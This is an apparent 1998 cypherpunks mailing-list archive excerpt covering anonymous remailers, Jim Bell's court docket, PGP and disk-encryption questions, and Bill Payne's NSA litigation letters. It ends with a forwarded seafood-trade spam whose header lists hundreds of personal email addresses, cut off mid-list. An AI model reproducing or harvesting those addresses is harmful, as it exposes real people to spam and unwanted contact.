TravelNews keeps on-line consumers updated on AirFares, Fare Wars, 
travel bargains, and other travel-related news.  If you would like a 
subscription to this FREE  news service, (no cost involved, all
addresses kept confidential,  can cancel at anytime, will receive
approximately 2-3 brief messages per month) call 919-383-0388  ext 11
DO NOT USE   REPLY button  !!

o
v
e
r

+M




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 4 Aug 1998 22:20:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: of Re: of the dickwads thing...
Message-ID: <199808050520.HAA22850@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I hope it can't be tracked, even by the operators.  That is the point
of making it anonymous. :)

I take no offense to a post suck as this. The sender obviously knows
almost nothing of the remailers,  letters coming out in a different
order preserve untracability.  The point for the names such as
Anonymous and Nobody are so you know it's  an anon remailer, there is
no reason to hide it and it helps to identify them.  If you want to
hide it you can.

---kryz <chrisharwig@hetnet.nl> wrote:
>
> I'm a pretty ignorant "cypherpunk".  I believe that this crap can be
> uncovered.
> Or is it a test or some thing like that.
> Why not crack the "Anonymous" person and hang 'm high. I can't do
that,
> helas!
> Maybe you can?
> 

> : they
> : can't even get their messages to come out in the same order that
they
> : came in by...
> :   Dumb, eh? Some of the test messages I sent to myself came back
in a
> : different order from that what I sent them in. I guess these guys
don't
> : know much about computers, eh?
> :   And those names, 'Anonymous' and 'Nobody', aren't fooling AnyBody,
> : because the minute you see them, you *know* that the message is
> : from a remailer.  Dumb, eh?

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Wed, 5 Aug 1998 06:25:26 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Sex change op to be shown live on web/Dog gets bionic balls
Message-ID: <19980805080001.2521.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/5/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 5 Aug 1998 06:40:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Latest
Message-ID: <199808051340.JAA25381@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpt from USA v. Jim Bell court docket:

Docket as of August 5, 1998 3:10 am               Pages 7-8

Proceedings include all events.                                   TERMED
3:97cr5270-ALLUSA v. Bell                                         APPEAL

6/22/98  --      DEFENDANT James Dalton Bell  arrested (car)
                 [Entry date 06/24/98]

6/23/98  48      MINUTES of Initial on Prob Revocation:DEW, Dep Clerk:Peter
                 Voelker, AUSA:Robb London, Def Counsel:Peter Voelker, Tape
                 #A473, USPO:Steven McNichols  D' arrested 6/22/98; D' adv
                 of rights; crt appts cnsl; D' adv of allegations in
                 violation petition; Gov't moves for detention this hrg,
                 proceeds, Gov't proffer, D' proffer; D' ORDERED DETAINED;
                 probation revocation hrg set for 11:00 a.m. on  7/10/98
                 before Judge Burgess  D' remanded. (car)
                 [Entry date 06/25/98]

6/23/98  49      ORDER  by Magistrate Judge David E. Wilson  appointing  as
                 the Federal Public Defender for defendant James Dalton Bell
                 (cc:  counsel) (car) [Entry date 06/25/98]

                                                                         BWM
6/30/98  50      MINUTE ORDER by Judge Franklin D. Burgess  that the
                 Probation Revocation hrg is rescheduled to 1:30 p.m. on
                 7/10/98 for James Dalton Bell (cc: counsel, Judge) (car)
                 [Entry date 06/30/98]

7/8/98   --      PROPOSED Supplemental Violations (car) [Entry date 07/08/98]


7/10/98  51      PROBATION PETITION/ORDER by Judge Franklin D. Burgess as to
                 James Dalton Bell re: Supplemental Violations  (cc:
                 counsel, Judge, USPO) (car) [Entry date 07/10/98]

7/15/98  52      MINUTE ORDER  by Judge Franklin D. Burgess ;  probation
                 revocation hrg continued to 9:00 7/31/98 for James Dalton
                 Bell (cc:  counsel, Judge) (km) [Entry date 07/15/98]

7/16/98  53      AMENDED MINUTE ORDER  by Judge Franklin D. Burgess ;
                 probation revocation hrg scheduled for 9:00 7/31/98 for
                 James Dalton Bell (cc:  counsel, Judge) (km)
                 [Entry date 07/16/98]

7/22/98  54      SUBSTITUTION OF COUNSEL on behalf of USA  Robert Louis
                 Jacob London terminating attorney Annmarie Levins for USA
                 (car) [Entry date 07/22/98]

7/31/98  55      MINUTES of Supervised Release Violations:FDB, Dep Clerk:B
                 Kay McDermott, AUSA:Rob London, Def Counsel:Peter Avenia,
                 CR:J Ryen  probation revocation hrg held Cnsl pres. Mr.
                 Bell pres in custody.  Court adv D' of charges.  D' enters
                 NOT GUILTY to violations 1,4,5,6, & 7 (violations 2 & 3 MOOT
                 as penalties are paid).  D' cnsl states for the record that
                 D' feels the Gov't is engaging in spying on him as a private
                 citizen and and requests that the Court conduct an
                 investigation into this activity; D' feels the conditions of
                 supervised release are unconstitutional. Mr. London advises
                 the court that no survelillance has been conducted on Mr.
                 Bell.  Court rules this hrg will proceed on the violations
                 charges only, D' concerns should be addressed in other
                 action.  Court inquires of cnsl if psychological evaluation
                 is required, D' cnsl adv the cour that D' does not feel this
                 hrg should proc because of his prior stated concerns of the
                 Gov't spying and conspiracy against him. D' request add'l
                 time to prep.  RECESS. D' cnsl adv the Court that D' not
                 prep to proc today, D' requests month continuance, D' cnsl
                 disagrees w/client's strategy. D' cnsl adv the Court mental
                 health eval may be approp. Gov't objs. Court adv parties
                 that mental health eval will be ordered. D' adv the Court he

                 wants investigation of Gov't actions. Court adv D' mental
                 health eval ordered.  Court orders Gov't to prep approp
                 order, iss of Mr. Avenia cont as cnsl will be addr. D'
                 remanded pending eval. (car) [Entry date 08/03/98]
                 [Edit date 08/03/98]

8/3/98   --      LODGED ORDER directing commitment of D' to submit to a
                 competency exam (car) [Entry date 08/04/98]

End Docket as of August 5, 1998 3:10 am






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joan Kowalchuk <joan@sk.sympatico.ca>
Date: Wed, 5 Aug 1998 08:47:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: more free stuff
Message-ID: <35C87F58.2F334B81@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 5 Aug 1998 01:03:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Question on secure programs
Message-ID: <199808050804.KAA04696@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sitting here browsing through my copy of applied cryptography and
I start to think.  How long will my 2047 bit PGP key be secure?  When
I look for secure I don't mean my family or the occasional hacker.  I
mean like a martial law state.  DES 56bit can be cracked in days or
hours,  public key cryptography is substancially easier to break than
symetric cryptography such as DES.  I want to get the best encrytion I
can so that one day when my computer is dug out of the ground and put
in an exibit at a college they still can't break my key.  I understand
my key is secure now, but what about in ten years when I'm famous and
my history is worth a mil? :)

Is mit still developing Mit PGP? or is 2.6.2 the last free version of
PGP that we will ever see?  




_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 5 Aug 1998 01:19:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SecDrv and Win95
Message-ID: <199808050819.KAA06317@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for a good HD encryptor.  The best one seems to be secdrv,
 Is this compatoble with win95? I'm asking because I know secdrv uses
tsr programs and drivers, but I am not familiar enough with win 95 to
be sure they will work together.  In win programming you don't use
interrupts and I'm sure that the drivers try to capture interupts. it
could still work if win95 calls int's to do it's work though.  Any info?




_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 5 Aug 1998 09:59:43 -0700 (PDT)
To: senatorlott@lott.senate.gov
Subject: MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS ADDRESSING JURISDICTIONAL ISSUES.
Message-ID: <35C88E56.2C2E@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 8/5/98 10:06 AM

John Young     http://www.jya.com/index.htm
Charles Smith  http://www.us.net/softwar/

I mailed envelopes to you both containing Herbert Richardson's FOIA info
about NSA attempting to sabotage Sandia/NSA projects.

This is documented at http://jya.com/da/whpda.htm

In John Young's envelope I included US Attorney Mitchell's

	MOTION FOR EXTENSION OF TIME TO FILE MEMORANDUM BRIEFS
	ADDRESSING JURISDICTIONAL ISSUES.

Certificate of service August 3, 1998.

Morales and I by FRAP 27 have 7 days 

  Any party may file a response in opposition to a motion other than
one   
  for procedural order [for which see subdivision (b)] within 7 days   
  after service of the motion,

http://www.ca5.uscourts.gov/docs/frap-iop.htm#27

plus 3 because of service by mail 

http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c 

to respond to Mitchell's latest motion.

Morales and I NEVER miss an opportunity to RESPOND.

Mitchell CONTINUES to list

 NATIONAL SECURITY AGENCY,

	Defendant - Appellee

Correct heading is

UNITED STATES COURT OF APPEALS    
       FOR THE TENTH CIRCUIT    
    
William H. Payne		            )    
Arthur R. Morales                           )    
                                            )    
Appellants Plaintiffs,                      )    
                                            )   98-2156 
v                                           )	98-1257    
					    )	    
Lieutenant General Kenneth A. Minihan, USAF )    
Director, National Security Agency	    )    
National Security Agency		    )    
                                            )    
Appellees Defendants                        )

We will get this corrected.

The government DOES NOT LIKE individuals named.  

Reason is that government employees like to hide behind an agency name
so
as to avoid

	1  responsibility
	2  accountability
	3  liability

But this is not going to happen in this matter.  
http://caq.com/cryptogate
http://www.aci.net/kalliste/speccoll.htm

Morales and I must soon implement our strategy of approaching the 

Senate Judiciary Committee  
  http://www.senate.gov/committee/judiciary.html   
in an EFFECTIVE WAY.

Approaching Hatch directly has proved ineffective in the past.
http://www.jya.com/whp071598.htm

Internet publication is a good way to be EFFECTIVE. 
http://www.jya.com/mi5-flap.htm

  The former agent, who was threatening to publish details of the
  supposed Qadaffi plot on the Internet, was arrested in a hotel room in
Paris.

and

  Now, with the advent of the Internet, it is probably only a matter of
time before Mr. Shayler's       allegations are disseminated.

  "He's a whistleblower," said Mr. Shayler's lawyer, John Wadham, the
director of Liberty, a civil      liberties group. 

Let's hope these matter are settled soon.  Then Morales and I can move
for dismissal of our
lawsuits.

We can all be off on OTHER constructive projects.  

Shaping-up the US legal system is a CONSTRUCTIVE PROJECT.  But it SHOULD
BE the senate judiciary
committee's responsibility.  They need to do their job.  Morales and I
will get things started.

I NEED to revise my book for the 80C32 with ieee 1284 ecp parallel
bi-directional communications.

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Later
bill


Monday 8/3/98 3:41 PM

FAX

Jan Elizabeth Mitchell
Assistant U.S. Attorney
U.S. Department of Justice
United States Attorney
District of New Mexico
Post Office Box 607
Albuquerque, NM 87103
505/346-7274
505/766-2868
FAX 505/346-7205

Dear Ms Mitchell:

Purpose of the fax is to 

1  review points covered in our 8/3/98 14:18 phone conversation
2  suggest settlement.

You phoned me today.

You told me that you planned to file a motion or response to the Tenth circuit's
request Morales and my response to the jurisdictional issue on the 21st of August.

I told you that this was premature on your part since we had moved for a second time
for an extension of time.

I told you also that this matter was now before congress.

You appeared to indicate to me that you were in the process of adding both Morales and
Minihan as named parties in this appeal.

You asked me if it would be agreeable to us if you filed a response to the Tenth circuit
21 days AFTER Morales and I filed our response to the Tenth circuit on the jurisdictional
issue.

I AGREED.

I spoke to Morales on the phone shortly after our phone conversation.

Arguing points of law before court clerks and judges who have outstanding criminal complaint
affidavits for crimes COMMITTED IN WRITING againtst them would be unproductive on Morales and my 
part.

Therefore, we will proceed to resolve the criminal conduct on the part of judges and court clerks
before we proceed further in this matter.

We will do this at the Congressional level.

Senate Judiciary Committe chairman Orrin Hatch, unfortunately, failed to properly process a valid
complaint on New Mexico district court chief judge John Conway in 1995.  
http://www.jya.com/whp071598.htm

Hatch's failure to properly respond in 1995, in large part, caused our current legal conflict with DIR NSA 
Minihan.

We foresee an unfortunate escalation of hostilities if this matter proceeds as it is.  

We do not wish this.

We seek settlement of the UNFORTUNATE matter at the earliest time.

We ask your and Congressional help to settle this UNFORTUNATE matter before it gets WORSE.

If I have made any essential material errors in reporting my impression of the contents of our conversation, 
then I would appreciate you giving your impression of possible errors.  

You can do this in the letter you said you would write to us.

Sincerely,


bill payne
13015 Calle de Sandias NE          	        
Albuquerque, NM 87111              	        

Distribution

Senate Judiciary Committee   e-mail
Arthur R Morales e-mail			





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian F. Silver" <silveri@mgmtscience.com>
Date: Wed, 5 Aug 1998 09:44:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SecDrv and Win95
In-Reply-To: <199808050819.KAA06317@replay.com>
Message-ID: <98Aug5.115014cdt.36865-1@gateway.mgmtscience.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 03:19 AM 8/5/98 -0500, you wrote:
>I'm looking for a good HD encryptor.  The best one seems to be
secdrv,
> Is this compatoble with win95? I'm asking because I know secdrv uses
>tsr programs and drivers, but I am not familiar enough with win 95 to
>be sure they will work together.  In win programming you don't use
>interrupts and I'm sure that the drivers try to capture interupts. it
>could still work if win95 calls int's to do it's work though.  Any
info?

I found an interesting "mount a container as a drive letter"
encryption program in finland called "BestCrypt NP", when I was first
looking for a program like you describe.  It's available for 3
environments currently, those being:  Dos, Windows 95, and Windows NT.

It has three algorithms that you can pick from for encryption:

GOST28147-89 (32 rounds, 256 bits primary key, 512 bits secondary key)
Blowfish (in Cipher Block Chaining Mode with 256-bit key length and 16
rounds)
DES

I use Blowfish and GOST (depending on the size of the container I'm
working with), and avoided DES, even before Deep Crack was invented. 
:-)

You can check out the product for yourself at:
http://jetico.sci.fi

I've been using the product for several months, and am rather pleased
with it.  I now keep my email, inbound attachments, netscape user
directory (including cache), scanned financial records, and PGP
private/public keyrings in this product's encrypted container files.

I've had the opportunity to test the company's support via email, and
I've been pleased with that as well.  The gentleman who appears to be
running the show is "Oleg Essine".

I'm looking at CFS (Cryptographic File System) for when I make the
jump away from Microsoft towards S.u.S.E. Linux 5.2.


-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5.2

iQA/AwUBNciNPItr/w7g57VBEQJjYQCglobgLYG+XEdNBDk4DHd0U++H1YoAoI3I
qkOSPeBNpz++iWRa1jchAjVH
=e+Nm
-----END PGP SIGNATURE-----

---
Ian F. Silver <silveri@mgmtscience.com> // Amateur Callsigns:  KD0DOA & VA3DOA
Management Science Associates  // Voice: 816-795-1947 x 249 // Fax:
816-373-6384
4801 CLIFFE AVENUE SUITE #300 INDEPENDENCE MO 64055
PGP DSS/DH Key Fingerprint: 951F 8B0E 8A84 AFAA B846  1AAF 8B6B FF0E E0E7 B541
PGP RSA    Key Fingerprint: 3B32 4848 1C1B 8F60  5200 B1B3 6656 2266




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Belinda Cook <doverfis@ozemail.com.au>
Date: Wed, 5 Aug 1998 02:34:37 -0700 (PDT)
To: "402000155@edi.de>
Subject: RE: The Catch of the Week
Message-ID: <01BDC089.543EDB60@sladl3p45.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	Sea-Ex[SMTP:seaex@big.net.au]
Sent: 	Wednesday, 5 August 1998 11:25
To: 	abafish@midwest.com.au; t.lewis@agsci.utas.edu.au; richig@g150.aone.net.au; amrico@ynet.y-net.com.au; pkrogh@powerup.com.au; aquatas@tassie.net.au; ari@argonaut.com.au; gwk2103@midcoast.com.au; sydaatz@ozemail.com.au; austfish@uret.net.au; Cheryl.Stanilewicz@austrade.gov.au; delia.ancrum-tennyson@austrade.gov.au; sean.riley@austrade.gov.au; newfish@icenet.com.au; peteryau@smart.net.au; colin@bight.com.au; 100245.2366@compuserve.com; austsea@pl.camtech.net.au; athors@ozemail.com.au; beku@southcom.com.au; bemco@bigpond.com; suters@acr.net.au; blueseas@blueseas.com.au; taspac@m140.aone.net.au; csi@squirrel.com.au; cccs@fastlink.com.au; gordon.yearsley@marine.csiro.au; tbp@bigpond.com.au; dominic@acay.com.au; delsea66@wizard.teksupport.net.au; djhfood@ecn.net.au; doverfis@ozemail.com.au; eppl@ca.com.au; erimusbl@ozemail.com.au; chen@seol.net.au; faroint@geko.net.au; fijifish@ozeafood.com; fisman@lisp.com.au; kippo@onaustralia.com.au; frionor@melbourne.starway.net.au; goodbran@next.com.au; glosea@bigpond.com; mcgrath@compack.com.au; mudcrabs@zed.org; trades@ibbco.aust.com; interon@ozemail.com.au; jbcfoods@internetnorth.com.au; johnjbsmarketing@bigpond.com; heriot@malvern.starway.net.au; kailis@enternet.com.au; lisa@kfm.dializ.oz.au; brolos@midwest.com.au; kenbry@onthenet.com.au; kvy@iig.com.au; kaquam@eisa.net.au; kvytas@eisa.net.au; marron@wn.com.au; derekw@powerup.com.au; con@dove.net.au; lonimar@ozemail.com.au; jai@one.net.au; mackayreef@m130.aone.net.au; exec@magnum.com.au; mncrdb@midcoast.com.au; milligan@iinet.net.au; jwilliams@mitco.com.au; mulataga@nettrek.com.au; munroint@bigpond.com.au; fishing@mures.com.au; warren@nswabalone.com.au; newberys@compuserve.com; ruelloinc@wr.com.au; nortas@netspace.net.au; oakfair@icenet.com.au; oceanic@oceanic.com.au; centavo@klever.net.au; pandm@ozemail.com.au; pacbasin@locainet.com.au; hanbo@vision.net.au; rdsimp@ozemail.com.au; roger@eis.net.au; pbros@poulosbros.com.au; cqcray@tpgi.com.au; andyjc@rainbowvalley.com.au; raptxpbr@ozemail.com.au; rathty@ncomm.net; redgum@networx.com.au; restfish@cairns.net.au; ricland@hotmail.com; jordans@mail.bigpond.com; seaforce@werple.net.au; seafresh@ozemail.com.au; johnperry@vicnet.net.au; sea@sealanes.com.au; scanning@iconnect.net.au; sori@pl.camtech.net.au; skolb@treko.net.au; swanboathire@beachaccess.com.au; sydfish@poulosbros.com.au; tas.fish@tassie.net.au; redfin@tassie.net.au; tascfood@ozemail.com.au; tassal@tassal.com.au; rebel-marine@iif.com.au; unichef@ozemail.com.au; uptop@iinet.net.au; ufish@peg.apc.org; wlake@midcoast.com.au; aqua@wn.com.au; weststate@accessin.com.au; bazza@ois.com.au; dcrichton@raptis.com.au; goodfood@ozemail.com.au; nifty6@hotmail.com; aquacns@sunshine.net.au; austrimi@onaustralia.com.au; 102060.3177@compuserve.com; 102400.611@compuserve.com; 103201.2076@compuserve.com; 1seafood@gte.net; 402000155@edi.de; 4272199@pager.mirabilis.com; 72530.2606@compuserve.com; 74133.231@compuserve.com; 76130.3373@compuserve.com; a.a.ali@cyber.net.pk; a39h0428@daisy.bu.ac.th; a912t19@idt.net; aarax@emirates.net.ae; access@seanet.com; accordim@ix.netcom.com; acee@raleigh.ibm.com; acmefish@aol.com; active83@netvision.net.il; admin@golden-trade.com; admin@infomare.it; admin@trade-express.com; administrator@ms.anfeng.com.tw; aef375006@pbs6.milton.port.ac.uk; aespeleta@compunet.net.co; afta@halcyon.com; agv@riverside.com; aj.lagemaat@hasdb.agro.nl; akafi@hotmail.com; akiko@nz.com; akoromilas@aol.com; akreds@aol.com; alabbas@super.net.pk; alainlange@hotmail.com; alan@astrainfo.com; alasund@ok.is; alberti@alberti-import-export.com; alconed@nexo.es; aldenaro@juno.com; aldot@usa.net; alfordj@digitalexp.com; alford-j@popmail.firn.edu; algaetech@maine.com; al-khulaqsaj@cardiff.ac.uk; allaboutexport@allaboutexport.com; alnida@giasmd01.vsnl.net.in; alpbay@aol.com; alphins@nceye.net; alsaeurope@glo.be; alzubedi@hotmail.com; amac@newave.net.au; amazonfish@aol.com; amazonpp@gate.net; ambrosca@ix.netcom.com; amesfer@khaleej.net.bh; amfood@netside.net; ampac@usa.net; anali@slt.lk; anandhi@giasmd01.vsnl.net.in; anders.wennerblom@bfc.umea.se; andre@galaxy-7.net; andreae@seaharvest.co.za; andujar@coqui.net; annette@bom3.vsnl.net.in; anova@anovafood.net; anton.triasta.citarate@ibm.net; antons@ww.co.nz; aolim@pacific.net.sg; aparrna@giasmd01.vsnl.net.in; apbimbo@crosslink.net; apexport@giascl01.vsnl.net.in; aquajet@ix.netcom.com; aquaman14@hotmail.com; aquamarsd@msn.com; arcpac@usa.net; areacode@sirius.com; arf@northcoast.com; arodri@hermes.uninet.net.mx; arqueo@pananet.com; art@the-wire.com; ashraf-hafez@usa.net; assistan@argenet.com.ar; aswin@md2.vsnl.net.in; athar@pak.net; atlahua@exxor.red2000.com.mx; atlahua@mail.red2000.com.mx; atlantic@atlantic.no; atldir@cgocable.net; ato@internet-fr.net; auction@ime.net; ausender@hotmail.com; avra@giasmd01.vsnl.net.in; bamboobridge@valise.com; bas@cerf.net; bastasic@modesty.bl.ac.yu; baymail@datasync.com; bbs@visi.com; bdaplace@iamerica.net; bearcat1@teleport.com; bell@giasmd01.vsnl.net.in; bensouda@moroccouscouncil.org; bgaines@lausd.k12.ca.us; bgill@citrus.infi.net; BH1099@aol.com; bikky@giasdl01.vsnl.net.in; bill@envirotainer.com; bionov@qbc.clic.net; bizhelper@angelfire.com; bizopp@forfree.at; b-jack@gmunro.ca; bjorn@ok.is; bleblanc@stavis.com; bliintl@cyberway.com.sg; blktigr@msn.com; blount@ix.netcom.com; bmaver4843@aol.com; boards@vldbros.com; bob@mcs.nl; boeki@netlaputa.ne.jp; bonecom@indosat.net.id; bonmark@zoo.co.uk; borzysz@friko2.onet.pl; borzysz@kki.net.pl; borzysz@polbox.com; bosbaybsn@msn.com; botsford@nbnet.nb.ca; bowen@zoomnet.net; bpeters@c4.net; brdbinca@aol.com; bregliano@big.it; brendanc@jetcity.com; brian@intersea-seafood.com; brian@neptunetrading.com; bright@bangla.net; brunop@idirect.com; bsd@mnet.fr; bstavis@stavis.com; bstrack@micron.net; btruedale@techpak.com; btruesdale@techpak.com; burren.fish@iol.ie; bziemann@aol.com; callissfd@hotmail.com; caltec@netvision.net.il; camanchaca@chilnet.cl; candying@bellsouth.net; cantanzaro.rich@heb.com; capeq@tiac.net; capitaine.cook@wanadoo.fr; capt.kev@usa.net; captcarl@haccp-seafood.com; captpaul@ptialaska.net; cardrest@gte.net; careers@careers.co.nz; carl@media.org; carol@gb.is.is; casafonso@aol.com; catanzaro.rich@heb.com; catchday@bellsouth.net; catego@i3d.qc.ca; ccdining@communique.net; cclink@idirect.com; cclong@redrose.net; cdtitles@world.std.com; ceyfoods@sri.lanka.net; cfxa31a@prodigy.com; c-gill@gmunro.ca; chandroo@rocketmail.com; changyun@public.nbptt.zj.cn; channel@icanect.net; charles@mcs.nl; chauvin@shrimpcom.com; cheena@mindlink.bc.ca; chesfishco@aol.com; chfish@cport.com; chinafish@china-fish.com; chips@geogr.ku.dk; chocolate@creativetreets.com; chris.carlson@pyamonarch.com; chris@clearsprings.com; christin.riise@atlantic.no; cian@gmunro.ca; cj@star-asia.com; cjmcoltd@ms13.hinet.net; cjnp@telcel.net.ve; ckeyes@iclp.com; ckeyes@mnib.com; clarke@marinefoods.co.nz; clarkew@allust.com.au; clickware@aol.com; cliff@key-west.com; clnis@clnis.inet.fi; clrfsfo@clearfreight.com; cnazca@perusat.net.pe; cockle@nzcockle.co.nz; cohansfd@aol.com; colland@earthlink.net; collins@myriadgate.net; comments@funbarbados.com; comments@global-imp-exp.com; comodity@gate.net; connors@exodus.uk.com; cooper@connors-seafoods.co.uk; coral@dhivehinet.net.mv; correo@avillar.es; cost@tkp.riga.lv; cottage@shore.intercom.net; coven@tin.it; cpayne@cwo.com; cpersio@csrlink.net; c-pride@juno.com; cpshkcom@netvigator.com; crawfish@microweb.com; crotonainternational1@home.com; cs-k@nnr.co.jp; csp@zebra.net; CTcallah@ix.netcom.com; cthomas@thomas-enterprises.com; ctk@worldnet.att.net; ctzj@pub.zjpta.net.cn; curinde@curacao.com; Custserv@fisherseafood.com; cypherpunks@toad.com; dabomb3044@aol.com; daciec@mail.dalian-gov.net; dacocorp@ix.netcom.com; dan@siri.org; dana@greatseafood.com; danex@vip.cybercity.dk; daruma@gte.net; david@cn.net.au; david123@gte.net; davids@saol.com; dawsonpaul@bigpond.com.au; dbfc@newportnet.com; dbilderb@pld.com; dbreede@ais.net; dd@star-asia.com; decay@flash.net; decdeb@tinet.ie; dedwards@iclp.com; dedwards@mnib.com; den@alona.net; dennis@rainbowtuna.com; dennisk@mitsui-foods.com; destudio@public1.sz.js.net; developers@reckon.com.au; devinequi@aol.com; dherrilko@webtv.net; dichten@hotmail.com; dim-daniels@aaf-hq2.tyson.com; dinon@dinon.com; divsfdsvc@ala.net; djfitz@iafrica.com; dkrishna@giasmd01.vsnl.net.in; dmine@ffb.fr; dongtai@public.cz.js.cn; donthompsonhaccp@msn.com; dorothy.ortale@yale.edu; drudie@ix.netcom.com; druin@laker.net; ds@star-asia.com; dsx@xnet.com; dunns@clubi.ie; dusan@menadzer.com; dutchi@netvision.net.il; dynamic@mweb.co.za; easleyj@doacs.state.fl.us; ebiberger@stavis.com; e-commerce@ceiec.com; ed.noel@snet.net; edepa@argenet.com.ar; editor@cbn.co.za; ekkwill@compuserve.com; elishias@onslowonline.net; elmara@rad.net.id; emes@brigadoon.com; emiliani@usa.net; emirikol@swbell.net; emmitt@clinic.net; envirotainer@envirotainer.com; ephemera@light.lightlink.com; erukos@sureste.com; estavis@stavis.com; ethedm@gte.net; eugenesu@ms13.hinet.net; eurotank@atlantic.net; evaldas@bi.balt.net; evarga@doc.gov; evolution@webdepart.com; exfresh@aol.com; eximport@idt.net; expac@aol.com; expack@aol.com; export@intl-tradement.com; ex-sfd@bellwouth.net; exshrimp@aol.com; extrapro@procosur.com; extrem@fx.ro; fairlanefd@juno.com; famold@mindspring.com; fao@eastfish.org; fasinfo@fas.usda.gov; fatcrab@steamedcrabs.com; fathoms@funbarbados.com; fazfrmgt2@aol.com; fbcab@mbox.vol.it; fdm@catsnet.com; filip@envirotainer.com; fininc@nbnet.nb.ca; firefuzz@datasync.com; fish.amal@clear.net.nz; fish@fishroute.com; fish@mgh.hb.eunet.de; fish@stavis.com; fish@web-net.com; fishbid@xyz.net; fishdev@aol.com; fisheries@ecology.bio.dfo.ca; fishhouse@pennekamp.com; fishinc@nbnet.nb.ca; fishmaninc@yahoo.com; fishmore@windsor.igs.net; fiskmark@treknet.is; fjdonoso@reuna.cl; fjord@gate.net; flhansen@pro-bolivia.com; fmak@tm.net.my; foodexp@sminter.com.ar; foodpro@voyager.co.nz; fratello@mendazer.com; Freeko@smipc.or.kr; freshfish@worldnet.att.net; friomar@adinet.com.uy; frozen@wanchese.com; fulfish@mail.cosapidata.com.pe; furni@fzu.edu.cn; fwu@deltatrak.com; gadco@iec.egnet.net; gadus@istar.ca; gaintown@ms14.hinet.net; gambie@pop3.concentric.net; gao@public.fz.fj.cn; garments@sietic.qd.sd.cn; garza@lagnetcom.mx; gated-people@merit.edu; gatorstick@aol.com; gdmec@dgup3.gd.cei.gov.cn; genehickman@msn.com; geoperfect@tip.nl; geotech@giasmd01.vsnl.net.in; germst@earthlink.net; ghodges@temptale.com; gilship@gmunro.ca; ginacarvalho@trinidad.net; gipse@node.com.br; gjh@pacific.net.sg; gjlimp@aol.com; gjsmall@worldnet.att.net; gla@glassociates.com; glacier@halcyon.com; glk@idt.net; global.wildlife@gtnet.gov.uk; global1940@aol.com; glynns@freewwweb.com; glynns@smart1.net; gnu@toad.com; gnyba@friko2.onet.pl; gnyba@kki.net.pl; gnyba@polbox.com; goldenstar@chinatrade.net; goodrichho@msn.com; gothamsfd@aol.com; gourmetclb@aol.com; gprobst142@aol.com; grans@gmunro.ca; graphic@lenet.fr; graycen@mindspring.com; g-routes@fox.nstn.ns.ca; gssfd@bellsouth.net; gtc@manufacture.com.tw; gulfexpress@gulfexpress.com; gunjur@aol.com; gwadman@tartannet.ns.ca; gylin@usa.net; gyorke@infoshare.ca; gzgarden@public.guangzhou.gd.cn; gzgmg@public1.guangzhou.gd.cn; hartsell.james.R000@sysco.com; halfbeak@hotmail.com; hallman@law.vill.edu; hansung@t-online.de; harish@giasmd01.vsnl.net.in; hcsp@dlews1.dl.cei.gov.cn; heinrich@indosat.net.id; helgimar@valeik.is; help@leisterpro.com; hendersd@mailgate.net.treas.gov; hernandezb@aol.com; hillsburn@ns.sympatico.ca; hillsburn@ns.sypatico.ca; himsa@himsa.com; hiteccom@giasmd01.vsnl.net.in; hmekran@paknet3.ptc.pk; hmunro@ibm.net; hnfishco@ix.netcom.com; hoxenberg@aol.com; hskaar@skaarint.com; huff@solander.co.nz; hugwill@total.net; hunterexporters@hunterlink.net.au; hunterss@sprynet.com; hwamerica@aol.com; hziq55@public.hzptt.sd.cn; ian@csiseafood.co.nz; ideveau@klis.com; idk@idkconsulting.com; imartin713@aol.com; impexc2000@aol.com; impship@gmunro.ca; incofoods@chilnet.cl; ine@tbd.gov.sg; info@abisnet.com; info@amalmark.co.nz; info@axcessdata.com; 